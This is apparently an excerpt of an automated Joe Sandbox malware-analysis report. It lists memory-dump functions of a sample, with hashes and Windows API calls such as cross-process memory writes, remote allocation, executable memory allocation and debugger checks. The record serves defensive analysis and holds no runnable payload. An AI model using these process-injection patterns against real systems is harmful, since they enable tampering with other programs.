                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_free
                                                          • String ID: #V&
                                                          • API String ID: 2620147621-4221984388
                                                          • Opcode ID: 4713c1530f2fdccbab2b3f94dfd25348eec59a4455dc15e2891f4484dd9cc6ae
                                                          • Instruction ID: f04482cebac655550a73fdf1ce0df667859403de70bc40421a8168050313d90a
                                                          • Opcode Fuzzy Hash: 4713c1530f2fdccbab2b3f94dfd25348eec59a4455dc15e2891f4484dd9cc6ae
                                                          • Instruction Fuzzy Hash: 6D517B716283028FDB28CF28C480B2FB7E5FF85315F15492DE88987251E731E925CB86
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: _memset$_memmove
                                                          • String ID: ERCP
                                                          • API String ID: 2532777613-1384759551
                                                          • Opcode ID: 894b722fb8d177f01218b6881c9adc0b96ebfc3ca710f2ebf9e8d00edf8a3319
                                                          • Instruction ID: 954a168fd50ed97b834dcd03c93a111aff19583a6adf44de572637054cd25ec9
                                                          • Opcode Fuzzy Hash: 894b722fb8d177f01218b6881c9adc0b96ebfc3ca710f2ebf9e8d00edf8a3319
                                                          • Instruction Fuzzy Hash: A051C671A2030A9BDB24DF64C8817AABBF8EF04310F24856EE54ADB281E77095E5CB40
                                                          APIs
                                                            • Part of subcall function 002B1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002A9E4E,?,?,00000034,00000800,?,00000034), ref: 002B1CE5
                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 002AA3F7
                                                            • Part of subcall function 002B1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002A9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 002B1CB0
                                                            • Part of subcall function 002B1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 002B1C08
                                                            • Part of subcall function 002B1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,002A9E12,00000034,?,?,00001004,00000000,00000000), ref: 002B1C18
                                                            • Part of subcall function 002B1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,002A9E12,00000034,?,?,00001004,00000000,00000000), ref: 002B1C2E
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002AA464
                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002AA4B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                          • String ID: @
                                                          • API String ID: 4150878124-2766056989
                                                          • Opcode ID: ac7d715bdb290ee4c80f2d9b7ed7792c858ede0305b430d67d5e37eb7da4aec0
                                                          • Instruction ID: 20f7875304edf0078c4fb0509d2f86227b197b8e57b91449b52f2e46e7b5f3c6
                                                          • Opcode Fuzzy Hash: ac7d715bdb290ee4c80f2d9b7ed7792c858ede0305b430d67d5e37eb7da4aec0
                                                          • Instruction Fuzzy Hash: 0D413B7294021CAFDB10DFA4CD85AEEBBB8EF49340F004095FA55B7180DA706EA5CFA1
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002D7A86
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002D7A9A
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 002D7ABE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: 0cb436011c3656a31fe8a7a23ec317abf7666dd9fd08f92678a0e445897c5993
                                                          • Instruction ID: b7f37de8c5b1fdc32a9d916eede92c867af6d4200844b6cc9e264d8aaa02be3a
                                                          • Opcode Fuzzy Hash: 0cb436011c3656a31fe8a7a23ec317abf7666dd9fd08f92678a0e445897c5993
                                                          • Instruction Fuzzy Hash: 1B21D332660219BFDF118F50CC86FEE3B69EF48714F110215FE146B2D0EAB5AC658BA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002D826F
                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002D827D
                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002D8284
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 4014797782-2298589950
                                                          • Opcode ID: 7be2fed606628cf60a799537607b7f7fa11c452759a3a690ba7e0eb48347f3d1
                                                          • Instruction ID: b37b6d440651259d4ba0b254bbbb99a3778cf70b20a4b53e5eb2dfa3c7ca8f87
                                                          • Opcode Fuzzy Hash: 7be2fed606628cf60a799537607b7f7fa11c452759a3a690ba7e0eb48347f3d1
                                                          • Instruction Fuzzy Hash: 78219FB5610249AFDB01DF58CCC5DA737BDEB4A754B08405AFA049B3A1CB70EC21CBA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002D7360
                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002D7370
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002D7395
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MoveWindow
                                                          • String ID: Listbox
                                                          • API String ID: 3315199576-2633736733
                                                          • Opcode ID: 84dbf586adbe0ab2bb48a0e62eb002191065fbf855c14265af5e4908ad5dafe1
                                                          • Instruction ID: 573effd0ef123ac7824e56e8ea83ddaed357ac8644bb701349d039f71420208b
                                                          • Opcode Fuzzy Hash: 84dbf586adbe0ab2bb48a0e62eb002191065fbf855c14265af5e4908ad5dafe1
                                                          • Instruction Fuzzy Hash: E121FF32624119BFDF128F54CC85FBF37AAEB89760F118125FD009B2A0D675AC619BA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002D7D97
                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002D7DAC
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002D7DB9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: c277bcb1bbdb54650b6136c54a35d6fd1dde034cb80f40bbd962a0f544fbd435
                                                          • Instruction ID: 01f668ce2a9dc8e0a8a01dd3a8cd96805b1802ce99177211013fc765f7623d31
                                                          • Opcode Fuzzy Hash: c277bcb1bbdb54650b6136c54a35d6fd1dde034cb80f40bbd962a0f544fbd435
                                                          • Instruction Fuzzy Hash: 6C11E372264249BEDF249F64CC45FEB3BAEEF89B14F114119FA41A61D0D7719861CB20
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 002D6FC7
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002D6FD6
                                                          Strings
                                                          • rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr, xrefs: 002D6F50
                                                          • edit, xrefs: 002D6FAB
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                                                          • API String ID: 2978978980-1987541987
                                                          • Opcode ID: 6543aa2557cbf79596fd3d21d79c15615983c43e3b45854c1a667aa5e9382255
                                                          • Instruction ID: a529562f2abe995942194c743b53b607889538d97056d2fec47073c3853c4a05
                                                          • Opcode Fuzzy Hash: 6543aa2557cbf79596fd3d21d79c15615983c43e3b45854c1a667aa5e9382255
                                                          • Instruction Fuzzy Hash: 4311BF71120609AFEB104F64EC88EFB3B6AEB05364F104715F966976E0C771DCA19B60
                                                          APIs
                                                            • Part of subcall function 0028B544: _memset.LIBCMT ref: 0028B551
                                                            • Part of subcall function 00270B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0028B520,?,?,?,0025100A), ref: 00270B79
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,0025100A), ref: 0028B524
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0025100A), ref: 0028B533
                                                          Strings
                                                          • =/, xrefs: 0028B514
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0028B52E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=/
                                                          • API String ID: 3158253471-1600368204
                                                          • Opcode ID: 3fac297a7d3d50f652416476aa554a2e7ef0938f59287c83e01b93076e574306
                                                          • Instruction ID: 1a17371c6f91021f70ed65af0d0b9a8518c9a68f64417597a54619f98ccf765a
                                                          • Opcode Fuzzy Hash: 3fac297a7d3d50f652416476aa554a2e7ef0938f59287c83e01b93076e574306
                                                          • Instruction Fuzzy Hash: FFE065B41103528BD321AF35E448752BAE4AF04344F44895DE845C6780D7B8D555CB51
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0029027A,?), ref: 002CC6E7
                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002CC6F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                          • API String ID: 2574300362-1816364905
                                                          • Opcode ID: f6511850e32b47740143f57dbf0952c3c07641b1298a2c2c59a0180ea7a38ed4
                                                          • Instruction ID: 644b59e37032a3fb796ca5168961d4640fdcef5d9e37ddb9c0a20d142058eb7b
                                                          • Opcode Fuzzy Hash: f6511850e32b47740143f57dbf0952c3c07641b1298a2c2c59a0180ea7a38ed4
                                                          • Instruction Fuzzy Hash: F1E08C385603138FD7205F26D888F42B6E8EB04724BA0842DE889CA250E7B0D8908B50
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00264B44,?,002649D4,?,?,002627AF,?,00000001), ref: 00264B85
                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00264B97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-3689287502
                                                          • Opcode ID: 4d591cb3540c07423a04d4db3e16d2ca58a5783b326ec9dfeb64ef0357953098
                                                          • Instruction ID: f3f080712cb90bb6823d981729b91e99147347f050c13ecadc6695e866e4f52c
                                                          • Opcode Fuzzy Hash: 4d591cb3540c07423a04d4db3e16d2ca58a5783b326ec9dfeb64ef0357953098
                                                          • Instruction Fuzzy Hash: 91D01270D607538FD7205F71EC9874676E4AF05755F51882ED4C5DA550D6B0E8D0C610
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00264AF7,?), ref: 00264BB8
                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00264BCA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                          • API String ID: 2574300362-1355242751
                                                          • Opcode ID: 7b54d34a09662a293ea151e0583a9961fffed15e24882d6cee0bee93aa4d6c8b
                                                          • Instruction ID: 3eeababef0e7e1bfb736659622cf0dca14ccc62c05cfcbbffb2db0bcc23748d4
                                                          • Opcode Fuzzy Hash: 7b54d34a09662a293ea151e0583a9961fffed15e24882d6cee0bee93aa4d6c8b
                                                          • Instruction Fuzzy Hash: 18D0C730CA03138FD720AF32EC88B0672E4AF00340B008C2ED4CACA991EAB0D8E0CA10
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,002D1696), ref: 002D1455
                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002D1467
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                          • API String ID: 2574300362-4033151799
                                                          • Opcode ID: 051977ef1eb08393a8f39ff18cef453369768126f3f8af380593f7896fa09b3c
                                                          • Instruction ID: e29fda79a6fb9729c140e9fa791247fbe0510d717e66a82ef30ad45bd780cc11
                                                          • Opcode Fuzzy Hash: 051977ef1eb08393a8f39ff18cef453369768126f3f8af380593f7896fa09b3c
                                                          • Instruction Fuzzy Hash: 10D0C2304613139FD7204FB1D88824272E4AF02381B10C82ED4D5DA690D6B0D8D0C650
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00265E3D), ref: 002655FE
                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00265610
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 2574300362-192647395
                                                          • Opcode ID: d88eaa677296d5f84b63b952c818a90e4e641c752df2757636f2d9ab738e6147
                                                          • Instruction ID: 1d4a76d41a29cf07701f6f70cbbcb25f3197372efc6a0c9453b4e6130c6389e1
                                                          • Opcode Fuzzy Hash: d88eaa677296d5f84b63b952c818a90e4e641c752df2757636f2d9ab738e6147
                                                          • Instruction Fuzzy Hash: 9FD0C234CB0763CFD7304F36D8C820676E8AF01745F81882DD485CA151D6B0C4D0C650
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,002C93DE,?,002E0980), ref: 002C97D8
                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002C97EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                          • API String ID: 2574300362-199464113
                                                          • Opcode ID: 7c50fc25f6d6774c74b1793cab7c23ad03a6f80a813d0dd4612e490ab96cdb8a
                                                          • Instruction ID: 41031a1123f742974284fbc8f002ff765743c21fefde6e45a7608f39cba931f3
                                                          • Opcode Fuzzy Hash: 7c50fc25f6d6774c74b1793cab7c23ad03a6f80a813d0dd4612e490ab96cdb8a
                                                          • Instruction Fuzzy Hash: 3AD012709617538FD7209F71E8CC746B6E4AF05791B51882DD4C5DA950DBB0C4D0C611
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?), ref: 002CE7A7
                                                          • CharLowerBuffW.USER32(?,?), ref: 002CE7EA
                                                            • Part of subcall function 002CDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002CDEAE
                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 002CE9EA
                                                          • _memmove.LIBCMT ref: 002CE9FD
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                          • String ID:
                                                          • API String ID: 3659485706-0
                                                          • Opcode ID: d13b78794343da212061d895c9bc5aba135cb086eefb906118c120c015abd954
                                                          • Instruction ID: e097addfa924faac5bbcfb22bd28242b497ec1a297ca89cf25d9a91e76358c1a
                                                          • Opcode Fuzzy Hash: d13b78794343da212061d895c9bc5aba135cb086eefb906118c120c015abd954
                                                          • Instruction Fuzzy Hash: 73C17B716243418FCB14DF28C480A6ABBE4FF89718F058A6EF8999B351D731E955CF82
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 002C87AD
                                                          • CoUninitialize.OLE32 ref: 002C87B8
                                                            • Part of subcall function 002DDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,002C8A0E,?,00000000), ref: 002DDF71
                                                          • VariantInit.OLEAUT32(?), ref: 002C87C3
                                                          • VariantClear.OLEAUT32(?), ref: 002C8A94
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                          • String ID:
                                                          • API String ID: 780911581-0
